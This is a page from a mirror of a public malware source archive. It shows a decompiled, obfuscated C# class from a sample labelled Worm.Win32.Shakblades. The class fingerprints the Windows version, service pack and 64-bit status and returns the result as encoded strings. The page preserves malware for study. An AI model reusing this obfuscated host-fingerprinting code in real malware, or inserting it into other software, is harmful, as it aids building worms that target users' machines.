mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
116 lines
5.9 KiB
C#
116 lines
5.9 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: Ҧ߲๒ʽ໙ୄᴘ.៷˴ᄨᥨᗽ
|
||
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
||
|
||
using System;
|
||
using System.Runtime.InteropServices;
|
||
|
||
namespace Ҧ߲๒ʽ໙ୄᴘ
|
||
{
|
||
internal class \u17F7\u02F4ᄨᥨᗽ
|
||
{
|
||
public static string ఽ\u087CᏃ()
|
||
{
|
||
OperatingSystem osVersion = Environment.OSVersion;
|
||
string str = "";
|
||
if (osVersion.Platform.ToString() == "Win32NT")
|
||
{
|
||
switch (\u17F7\u02F4ᄨᥨᗽ.\u0AE7ԵॻƂẺႦᛀળ(osVersion.Version))
|
||
{
|
||
case "4.1.2222":
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEfYO8ENT0v4ERA=", true);
|
||
break;
|
||
case "4.1.2600":
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEdP2DvBDUv4ERArHQ==", true);
|
||
break;
|
||
case "4.9.3000":
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("[WINME]", true);
|
||
break;
|
||
case "5.0.2195":
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEdP2DvBDUv4CggICA==", true);
|
||
break;
|
||
case "5.1.2600":
|
||
case "5.2.3790":
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("L0FGPEfYO8ENT0v4MCg=", true);
|
||
break;
|
||
case "6.0.6000":
|
||
case "6.0.6001":
|
||
case "6.0.6002":
|
||
case "6.0.6003":
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("+w0SCBMbpHuKjhfE+g0XGAU=", true);
|
||
break;
|
||
case "6.1.7600":
|
||
case "6.1.7601":
|
||
case "6.1.7602":
|
||
case "6.1.7603":
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("+w0SCKR7io4TGxfE2w==", true);
|
||
break;
|
||
default:
|
||
str = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("+RIPpHuKjhITGxI=", true);
|
||
break;
|
||
}
|
||
}
|
||
string empty = string.Empty;
|
||
\u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ ᴀᅒਗ਼ߎᘘᒯܡᤄ = new \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ();
|
||
ᴀᅒਗ਼ߎᘘᒯܡᤄ.ܨ = Marshal.SizeOf(typeof (\u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ));
|
||
if (\u17F7\u02F4ᄨᥨᗽ.ᰐረἣە\u104C(ref ᴀᅒਗ਼ߎᘘᒯܡᤄ))
|
||
{
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DR", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEk=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DS", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEo=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DT", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEs=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DU", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEw=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DV", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE0=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DW", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE4=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DX", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE8=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("a32KjoF7fRhXNLA4aHl7gzhQ", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iLtoXUo8uKA=", true);
|
||
if (ᴀᅒਗ਼ߎᘘᒯܡᤄ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("a32KjoF7fRhXNLA4aHl7gzhR", true)))
|
||
str += \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iLtoXUo8uKE=", true);
|
||
}
|
||
return !\u17F7\u02F4ᄨᥨᗽ.ᣁ() ? str + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCgng==", true) : str + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCenA==", true);
|
||
}
|
||
|
||
private static string \u0AE7ԵॻƂẺႦᛀળ(Version _param0) => _param0.Major.ToString() + "." + _param0.Minor.ToString() + "." + _param0.Build.ToString();
|
||
|
||
[DllImport("kernel32.dll", EntryPoint = "GetVersionEx")]
|
||
private static extern bool ᰐረἣە\u104C(ref \u17F7\u02F4ᄨᥨᗽ.ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ _param0);
|
||
|
||
public static bool ᣁ()
|
||
{
|
||
try
|
||
{
|
||
return !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("ProgramW6432"));
|
||
}
|
||
catch
|
||
{
|
||
return false;
|
||
}
|
||
}
|
||
|
||
public struct ᴀᅒ\u007Eਗ਼ߎᘘᒯܡᤄ
|
||
{
|
||
public int ܨ;
|
||
public int \u003Fᵚᇛჩᬃഢᨨ\u00F7;
|
||
public int தጢ\u104Bᥞᶑᄧ᭐ώ\u0040;
|
||
public int ᔥڟ;
|
||
public int ṏÕấᮺ\u087D;
|
||
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
|
||
public string \u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E;
|
||
public short ƹᗰ\u0FC0\u0A56uᅜ;
|
||
public short \u0F72ြॽӰᢟ͒ᣃẈᅂ;
|
||
public short \u0F30ṋᄆᆃẈҤ;
|
||
public byte \u1CED\u0EF0\u0B9BŢᵕ\u1398᩵ᗀἱ;
|
||
public byte \u1DC7ഛեᮈ\u0FD9;
|
||
}
|
||
}
|
||
}
|